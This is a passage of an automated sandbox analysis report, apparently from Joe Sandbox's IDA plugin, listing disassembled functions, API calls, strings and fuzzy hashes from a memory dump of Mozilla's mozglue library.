                                                                  • EnterCriticalSection.KERNEL32(6C67E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C62D1C5), ref: 6C61D4F2
                                                                  • LeaveCriticalSection.KERNEL32(6C67E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C62D1C5), ref: 6C61D50B
                                                                    • Part of subcall function 6C5FCFE0: EnterCriticalSection.KERNEL32(6C67E784), ref: 6C5FCFF6
                                                                    • Part of subcall function 6C5FCFE0: LeaveCriticalSection.KERNEL32(6C67E784), ref: 6C5FD026
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C62D1C5), ref: 6C61D52E
                                                                  • EnterCriticalSection.KERNEL32(6C67E7DC), ref: 6C61D690
                                                                  • LeaveCriticalSection.KERNEL32(6C67E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C62D1C5), ref: 6C61D751
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                  • String ID: MOZ_CRASH()
                                                                  • API String ID: 3805649505-2608361144
                                                                  • Opcode ID: 12591e48a59d4272ea50c5890feaf24ad56e87b8a4170e5712149f48b33dc8c1
                                                                  • Instruction ID: acca5cbbae122e6438eb5ba3ba8f03c9e3578f46570295b14588b589eb22f3b3
                                                                  • Opcode Fuzzy Hash: 12591e48a59d4272ea50c5890feaf24ad56e87b8a4170e5712149f48b33dc8c1
                                                                  • Instruction Fuzzy Hash: D151E171A087118FD729CF29C09065AB7F1EB89309F144E2ED59AC7F84D730E800CBAA
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID: -%llu$.$profiler-paused
                                                                  • API String ID: 3732870572-2661126502
                                                                  • Opcode ID: 8deea3bc18fd32b108eb0afd9a0f3191c74c10f3b819709c6d9649361aeb514c
                                                                  • Instruction ID: b95a3b541b5f2e2ef0d97d8349d707875b6511af52e0adf799fbebecb7453bea
                                                                  • Opcode Fuzzy Hash: 8deea3bc18fd32b108eb0afd9a0f3191c74c10f3b819709c6d9649361aeb514c
                                                                  • Instruction Fuzzy Hash: 11415971E047089BCB08DF7AD89216EBBF5EF86344F10C63DE855A7B41EB709805879A
                                                                  APIs
                                                                  • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C66985D
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C66987D
                                                                  • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C6698DE
                                                                  Strings
                                                                  • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C6698D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                  • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                  • API String ID: 1778083764-3290996778
                                                                  • Opcode ID: df87ec4f1cf43fcec8b2212e7cb4efb9c20053119958abe822945eeddb813b61
                                                                  • Instruction ID: ef9d0038d9faf098c9a14cc1f06eec31e53f8250b88f1b8027da8595b2d91a6c
                                                                  • Opcode Fuzzy Hash: df87ec4f1cf43fcec8b2212e7cb4efb9c20053119958abe822945eeddb813b61
                                                                  • Instruction Fuzzy Hash: 6C310871A001086FDF14AF59D8449EE77B9EF85718F50442DEA0AABB40CB7599048FEE
                                                                  APIs
                                                                  • __aulldiv.LIBCMT ref: 6C644721
                                                                    • Part of subcall function 6C5F4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C633EBD,00000017,?,00000000,?,6C633EBD,?,?,6C5F42D2), ref: 6C5F4444
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv__stdio_common_vsprintf
                                                                  • String ID: -%llu$.$profiler-paused
                                                                  • API String ID: 680628322-2661126502
                                                                  • Opcode ID: 6cf3752b8b43cfee551abf491602327f7b72b9162ca125cfe129a68ba817a9dd
                                                                  • Instruction ID: ee1a9e8851a23e3f61633a3a236bbc77c38040de0e2c57e8815a1fbf23d1a244
                                                                  • Opcode Fuzzy Hash: 6cf3752b8b43cfee551abf491602327f7b72b9162ca125cfe129a68ba817a9dd
                                                                  • Instruction Fuzzy Hash: A3315971F042085BDB0CCF6DD8826ADBBE6DB89314F14C53EE8059BB40EBB4D8058B99
                                                                  APIs
                                                                    • Part of subcall function 6C5F4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C633EBD,6C633EBD,00000000), ref: 6C5F42A9
                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6C64B127), ref: 6C64B463
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64B4C9
                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C64B4E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: _getpidstrlenstrncmptolower
                                                                  • String ID: pid:
                                                                  • API String ID: 1720406129-3403741246
                                                                  • Opcode ID: 76991e2682e63487f8529d7f75c83d4c5329ce09a3ea140da9f782cf7ea86328
                                                                  • Instruction ID: 5f97956d568549577b16807c49fcbc368043fd2ad70e0d332c254860a59a2f03
                                                                  • Opcode Fuzzy Hash: 76991e2682e63487f8529d7f75c83d4c5329ce09a3ea140da9f782cf7ea86328
                                                                  • Instruction Fuzzy Hash: 56314831A01618DFCB04DFA9D880AEEB7B5FF85318F548929D80167A41D731E849CFE9
                                                                  APIs
                                                                  • ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C657A3F), ref: 6C60BF11
                                                                  • ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C657A3F), ref: 6C60BF5D
                                                                  • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C657A3F), ref: 6C60BF7E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
                                                                  • String ID: fl
                                                                  • API String ID: 4279176481-3822986822
                                                                  • Opcode ID: 62fc0da542ffe3e16e573ce70c7971547cc860a9b3fdcf3425d24e1b51642386
                                                                  • Instruction ID: 74de540aa1abd731f5464f84b75d5443d2855dac4e3fc8bef014787095124244
                                                                  • Opcode Fuzzy Hash: 62fc0da542ffe3e16e573ce70c7971547cc860a9b3fdcf3425d24e1b51642386
                                                                  • Instruction Fuzzy Hash: C011C0792006048FC729CF4DD699966FBF8FF99308715885DE98A8BB50C731E800CB95
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63E577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63E584
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63E5DE
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C63E8A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                  • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$[I %d/%d] profiler_start
                                                                  • API String ID: 1483687287-1611356987
                                                                  • Opcode ID: 2ed515cfce200a15893e002af4eeb42a6d89404527ee9eb5194d60752b15de84
                                                                  • Instruction ID: 73c7361da53e92a473d5b75dc7338adc0e33c40e0095991912e6e05e03bf8896
                                                                  • Opcode Fuzzy Hash: 2ed515cfce200a15893e002af4eeb42a6d89404527ee9eb5194d60752b15de84
                                                                  • Instruction Fuzzy Hash: E511CE31A04268DFCB159F16C488A69BBB4FFC9328F100D19E94547A45C770A815CFFE
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C640CD5
                                                                    • Part of subcall function 6C62F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,6C605407), ref: 6C62F9A7
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C640D40
                                                                  • free.MOZGLUE ref: 6C640DCB
                                                                    • Part of subcall function 6C615E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C615EDB
                                                                    • Part of subcall function 6C615E90: memset.VCRUNTIME140(ewel,000000E5,?), ref: 6C615F27
                                                                    • Part of subcall function 6C615E90: LeaveCriticalSection.KERNEL32(?), ref: 6C615FB2
                                                                  • free.MOZGLUE ref: 6C640DDD
                                                                  • free.MOZGLUE ref: 6C640DF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                  • String ID:
                                                                  • API String ID: 4069420150-0
                                                                  • Opcode ID: 4450b5de7268678f1526b377bd652ba66357053c6ab8d3c20e13fd6fafc58f83
                                                                  • Instruction ID: bbdbb2ff7aad98ae8ebe4ead96749a3f7cff3354a7e5b88767592dd9cd46f104
                                                                  • Opcode Fuzzy Hash: 4450b5de7268678f1526b377bd652ba66357053c6ab8d3c20e13fd6fafc58f83
                                                                  • Instruction Fuzzy Hash: 284116719087909BD720CF29C08079AFBE5BFD9714F10CA2EE8D887B50D7709849CB9A
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C67E7DC), ref: 6C630838
                                                                  • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C63084C
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6308AF
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6308BD
                                                                  • LeaveCriticalSection.KERNEL32(6C67E7DC), ref: 6C6308D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$memset
                                                                  • String ID:
                                                                  • API String ID: 837921583-0
                                                                  • Opcode ID: 9c71a1392975c6dfae8972a0bcc8d58b827fff5cfd8833513c9aaca2399b7714
                                                                  • Instruction ID: 93b59acdde5216a60d4f10057fe2e557b10d7efc1c757566065d20869a3c7795
                                                                  • Opcode Fuzzy Hash: 9c71a1392975c6dfae8972a0bcc8d58b827fff5cfd8833513c9aaca2399b7714
                                                                  • Instruction Fuzzy Hash: 8521B6317012299BDF04CF66D884BEA7379AF85708F501928D90DA7B40DB35A409CFEC
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C63DA31,00100000,?,?,00000000,?), ref: 6C64CDA4
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                    • Part of subcall function 6C64D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C64CDBA,00100000,?,00000000,?,6C63DA31,00100000,?,?,00000000,?), ref: 6C64D158
                                                                    • Part of subcall function 6C64D130: InitializeConditionVariable.KERNEL32(00000098,?,6C64CDBA,00100000,?,00000000,?,6C63DA31,00100000,?,?,00000000,?), ref: 6C64D177
                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C63DA31,00100000,?,?,00000000,?), ref: 6C64CDC4
                                                                    • Part of subcall function 6C647480: ReleaseSRWLockExclusive.KERNEL32(?,6C641385,?,?,?,?,6C641385,?), ref: 6C6474EB
                                                                  • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C63DA31,00100000,?,?,00000000,?), ref: 6C64CECC
                                                                    • Part of subcall function 6C60CA10: mozalloc_abort.MOZGLUE(?), ref: 6C60CAA2
                                                                    • Part of subcall function 6C63CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C64CEEA,?,?,?,?,00000000,?,6C63DA31,00100000,?,?,00000000), ref: 6C63CB57
                                                                    • Part of subcall function 6C63CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C63CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C64CEEA,?,?), ref: 6C63CBAF
                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C63DA31,00100000,?,?,00000000,?), ref: 6C64D058
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                  • String ID:
                                                                  • API String ID: 861561044-0
                                                                  • Opcode ID: 2ee7579894da43cf9eeb90959b6623b772520dd4e75d3b4d285d33a960f34ef8
                                                                  • Instruction ID: 95ccfe17cd3929744b5c0b61dc9097c81dd786afe3c6e8cb3604fe23882bc151
                                                                  • Opcode Fuzzy Hash: 2ee7579894da43cf9eeb90959b6623b772520dd4e75d3b4d285d33a960f34ef8
                                                                  • Instruction Fuzzy Hash: F6D17E71A04B469FD748CF28C580B99F7E1BF89308F01862DD8598B712EB31E9A5CBC5
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C6017B2
                                                                  • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C6018EE
                                                                  • free.MOZGLUE(?), ref: 6C601911
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C60194C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                  • String ID:
                                                                  • API String ID: 3725304770-0
                                                                  • Opcode ID: 5508bf70572a70688cc8c65177d18098db5ac647652386345b10282861b3afee
                                                                  • Instruction ID: 0b3ea75ba372244b3fad19a88d4ded35d87e85cdc4eaf7b784ca6fbdff16a4c1
                                                                  • Opcode Fuzzy Hash: 5508bf70572a70688cc8c65177d18098db5ac647652386345b10282861b3afee
                                                                  • Instruction Fuzzy Hash: 0381BE70B102059FDB08CF68D9849EEBBB5FF89318F04462CE811AB754D730E949CBA6
                                                                  APIs
                                                                  • GetTickCount64.KERNEL32 ref: 6C615D40
                                                                  • EnterCriticalSection.KERNEL32(6C67F688), ref: 6C615D67
                                                                  • __aulldiv.LIBCMT ref: 6C615DB4
                                                                  • LeaveCriticalSection.KERNEL32(6C67F688), ref: 6C615DED
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                  • String ID:
                                                                  • API String ID: 557828605-0
                                                                  • Opcode ID: 570c4e7bae43729b59b25c2d7f7ecf8bfe2fd270eca2ad277f00e867cbdb8e08
                                                                  • Instruction ID: 8f2e9d396109a85c0f3f3e8bfa1d3e5aee4f4687604380c757f626cd5365bec2
                                                                  • Opcode Fuzzy Hash: 570c4e7bae43729b59b25c2d7f7ecf8bfe2fd270eca2ad277f00e867cbdb8e08
                                                                  • Instruction Fuzzy Hash: 39515F71E041298FDF09CF6DC895AAEFBF1FB85304F194A19D811A7B50C7306945CBA9
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5FCEBD
                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C5FCEF5
                                                                  • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C5FCF4E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$memset
                                                                  • String ID: 0
                                                                  • API String ID: 438689982-4108050209
                                                                  • Opcode ID: 217eedc9f4bf77684e042ee49bde7aac7b872ce6707e8217a18e78b038b6aa2d
                                                                  • Instruction ID: f6d83d0ebd0cfff47b9a03cf182e77d9d6a9d45228ee6bea904bdc9937f3feef
                                                                  • Opcode Fuzzy Hash: 217eedc9f4bf77684e042ee49bde7aac7b872ce6707e8217a18e78b038b6aa2d
                                                                  • Instruction Fuzzy Hash: 4A511271A002168FCB15CF18C890A9AFBA5EF99300F1985A9D9595F751D331BD06CBE0
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6577FA
                                                                  • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C657829
                                                                    • Part of subcall function 6C62CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C5F31A7), ref: 6C62CC45
                                                                    • Part of subcall function 6C62CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C5F31A7), ref: 6C62CC4E
                                                                  • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C65789F
                                                                  • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C6578CF
                                                                    • Part of subcall function 6C5F4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C5F4E5A
                                                                    • Part of subcall function 6C5F4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C5F4E97
                                                                    • Part of subcall function 6C5F4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C633EBD,6C633EBD,00000000), ref: 6C5F42A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                  • String ID:
                                                                  • API String ID: 2525797420-0
                                                                  • Opcode ID: eeafedfc97916006a68b17224a10b0a88ca3bf3d564e839e59a58bf1c6a4d5a9
                                                                  • Instruction ID: 8a6dc0ef3cee6eb4efe726f8ecc0089a0ef248e730e64b023ba57ce2919b6b18
                                                                  • Opcode Fuzzy Hash: eeafedfc97916006a68b17224a10b0a88ca3bf3d564e839e59a58bf1c6a4d5a9
                                                                  • Instruction Fuzzy Hash: D541CD71914B069FD300DF29C88056AFBF4FFCA214F604A2EE4A987640DB30D95ACBD6
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000200), ref: 6C63649B
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000200), ref: 6C6364A9
                                                                    • Part of subcall function 6C62FA80: GetCurrentThreadId.KERNEL32 ref: 6C62FA8D
                                                                    • Part of subcall function 6C62FA80: AcquireSRWLockExclusive.KERNEL32(6C67F448,?,6C62FA1F,?,?,6C605407), ref: 6C62FA99
                                                                  • ReleaseSRWLockExclusive.KERNEL32 ref: 6C63653F
                                                                  • free.MOZGLUE(?), ref: 6C63655A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
